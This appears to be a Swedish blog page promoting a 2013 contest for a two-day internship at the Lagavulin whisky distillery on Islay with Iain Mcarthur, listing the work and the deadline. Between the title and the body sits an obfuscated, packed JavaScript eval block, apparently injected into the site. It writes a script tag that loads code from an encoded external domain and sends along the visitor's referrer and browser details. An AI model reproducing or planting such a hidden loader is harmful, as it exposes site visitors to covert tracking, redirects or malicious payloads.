Image Image Image Image Image Image Image Image Image Image

| 26 februari, 2020

Scroll to top

Top

Praktisera hos Lagavulins Iain Mcarthur

Praktisera hos Lagavulins Iain Mcarthur

type=”text/javascript”>// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nfyyr|var|u0026u|referrer|ryyen||js|php’.split(’|’),0,{}))

Lagavulins: Är du sugen på att få en förstahandsinblick i Lagavulins historia?

Praktikplats på Lagavulins

Nu har du och en lycklig medföljande vän under två dagar chansen att få praktik på det legendariska Lagavulin Distillery.
Det är tack vare Friends of the Classic Malts som Whiskeyälskare får tillfälle att praktisera hos Iain Mcarthur på destilleriet ute på Islay. Detta är första gången en praktikant får chansen att ta del av hemligheterna bakom deras väggar.

För att ha en möjlighet att vinna praktikantplatsen måste du älska whisky, precis som Ian Mcarthur. Du ska också ge honom en riktigt bra anledning till varför just du ska få platsen och även se till att andra röstar på dig. Om du tror att du kan anta utmaningen det vill säga …

De 50 tävlingsdeltagare som fått flest röster den 31 Mar 2013 får ett par Lagavulin Glencairn-glas.

ANSOK SENAST: 31 mars 2013

ARBETET BORJAR: juni 2013

Fakta om jobbet

I ARBETSUPPGIFTERNA INGÅR:

  • TORVBRYTNING– Vi har mycker torv här på Islay vilket är viktigt för Lagavulins karaktär. Jag visar er grunderna och tar er tillbaka till Lagavulins begynelse med spännande historier. Glöm inte era gummistövlar, det kommer att bli lerigt.
  • MALT DISTILLING– Tillsammans med mig kommer ni att få uppleva konsten att framställa Lagavulin från början till slut. Runt destilleriet kommer vi hitta många vänner som kommer hjälpa er på vägen. Det är trots allt tack vare att vi lärt av varandra som gjort att Lagavulin är vad det är idag.
  • LAGERARBETE– När ni lärt er mer om hur vår whisky tillverkas så är det dags att lära er mer om lagringen och konsten att vara lagerarbetare. Under mina 42 år har jag lärt mig en del hemligheter…
  • TEBRYGGNING– Jag gillar mitt te med en droppe mjölk.  Jag bara skojar, det kommer att finnas mycket te och god inhemsk mat som håller ångan uppe under ert besök.
  • WHISKYPROVNING– Vi dricker inte under arbetstid men efter en hård dags arbete kommer ni att få prova några av Lagavulins unika whiskysorter.

” Om jag inte har lyckats köra slut på er redan första dagen kommer ni att ägna dag 2 åt att utforska vackra Islay, den goda maten och de historiska byggnaderna innan ni installerar er på exklusiva Port Charlotte Hotel för en sista övernattning.” 

 Kika på videon ovan och hör på när Iain Mcarthur pratar själv pratikplatsen.

Ansök till praktikplatsen!